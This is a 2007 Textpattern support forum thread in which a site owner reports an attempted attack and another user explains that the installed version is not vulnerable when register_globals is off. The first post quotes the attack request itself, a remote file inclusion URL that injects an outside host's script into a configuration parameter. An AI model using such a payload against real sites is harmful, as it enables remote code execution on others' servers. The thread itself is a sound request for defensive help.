Under Attack

tglawe · 2007-08-18 09:06:34

Today somebody tried to execute an external script on my TXP 4.0.5 Installation:

path/textpattern/publish.php?txpcfg%5Btxpath%5D=http://usuarios.arnet.com.ar/larry123/safe.txt?

The Code ist still online. May anybody have a look, if this could be dangerous.

I’m not pretty handy with PHP.

ruud · 2007-08-18 09:17:43

The key word here is “tried”.
If ‘register globals’ is set to ‘no’ (recommended anyway), then this isn’t a problem anway.
I believe this attack is aimed at an antique version of TXP so 4.0.5 isn’t vulnerable to this attack.

Last edited by ruud (2007-08-18 09:21:34)

tglawe · 2007-08-18 09:21:03

Sorry for the multi post – I’got every time an error response and now this topic has been posted four times.

Thnks for response.

ruud · 2007-08-18 09:22:25

You should be able to delete those duplicate posts yourself (there’s a ‘delete’ link at the right side of the post, once you’re viewing it.

tglawe · 2007-08-18 09:28:20

Sorry no. I’ll just get an “edit” link, where I have no chance to delete the duplicated posts.

ruud · 2007-08-18 09:34:57

Hmm.. okay, I’ll ask a moderator to remove them.

tglawe · 2007-08-18 09:36:16

It’s my mistake, I have to do that.

But thank you anyway.

Last edited by tglawe (2007-08-18 09:36:40)

Mary · 2007-08-18 13:41:05

I think that was this one.

Textpattern CMS

Textpattern CMS support forum

#1 2007-08-18 09:06:34

Under Attack

#2 2007-08-18 09:17:43

Re: Under Attack

#3 2007-08-18 09:21:03

Re: Under Attack

#4 2007-08-18 09:22:25

Re: Under Attack

#5 2007-08-18 09:28:20

Re: Under Attack

#6 2007-08-18 09:34:57

Re: Under Attack

#7 2007-08-18 09:36:16

Re: Under Attack

#8 2007-08-18 13:41:05

Re: Under Attack

Board footer